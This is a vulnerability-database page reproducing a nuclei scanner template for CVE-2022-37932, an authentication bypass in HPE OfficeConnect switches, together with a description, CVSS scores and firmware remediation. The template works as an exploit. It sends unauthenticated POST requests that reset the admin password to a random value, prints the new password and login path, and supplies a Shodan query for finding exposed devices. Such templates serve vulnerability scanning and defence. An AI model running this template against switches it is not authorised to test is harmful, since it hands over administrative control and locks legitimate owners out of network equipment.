Lucene search
K

HP Switch - Authentication Bypass

๐Ÿ—“๏ธย 07 Jul 2026ย 16:50:48Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 11ย Views

Authentication bypass in HP OfficeConnect switches may allow remote admin access without credentials.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2022-37932
10 Apr 202503:27
โ€“githubexploit
Circl
CVE-2022-37932
12 Dec 202216:25
โ€“circl
CNNVD
Hewlett Packard Enterprise OfficeConnect ๆŽˆๆƒ้—ฎ้ข˜ๆผๆดž
12 Dec 202200:00
โ€“cnnvd
CVE
CVE-2022-37932
30 Nov 202215:23
โ€“cve
Cvelist
CVE-2022-37932
30 Nov 202215:23
โ€“cvelist
EUVD
EUVD-2022-40539
30 Nov 202215:23
โ€“euvd
NCSC
Vulnerability in HPE OfficeConnect switches
22 Nov 202200:00
โ€“ncsc
NVD
CVE-2022-37932
12 Dec 202213:15
โ€“nvd
Prion
Authentication flaw
12 Dec 202213:15
โ€“prion
Positive Technologies
PT-2022-24164 ยท Hewlett Packard ยท Officeconnect 1920Sย +2
21 Nov 202200:00
โ€“ptsecurity
Rows per page
id: CVE-2022-37932

info:
  name: HP Switch - Authentication Bypass
  author: Phulelouch
  severity: high
  description: |
    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
  impact: |
    Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations.
  remediation: |
    Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series.
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37932
    epss-score: 0.02641
    epss-percentile: 0.83743
    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: hpe
    product: officeconnect_1820_j9979a_firmware
    shodan-query: html:"HPE OfficeConnect"
  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive,vkev,vuln

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && (http(2) || http(3))

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '<title>HPE OfficeConnect Switch 1920')"
        condition: and
        internal: true

  - raw:
      - |
        POST /login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
  - raw:
      - |
        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
# digest: 4a0a00473045022100e58e85a391b58650fc8ef3651beb2311d0f3755fd338df1bae59c1d74b46f6f6022075f365afef4ecac5cc900adb2b60a8e6c9a2e2bda8b92a3872adb57ca389a551:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.18.8 - 9.8
EPSS0.02641
SSVC
11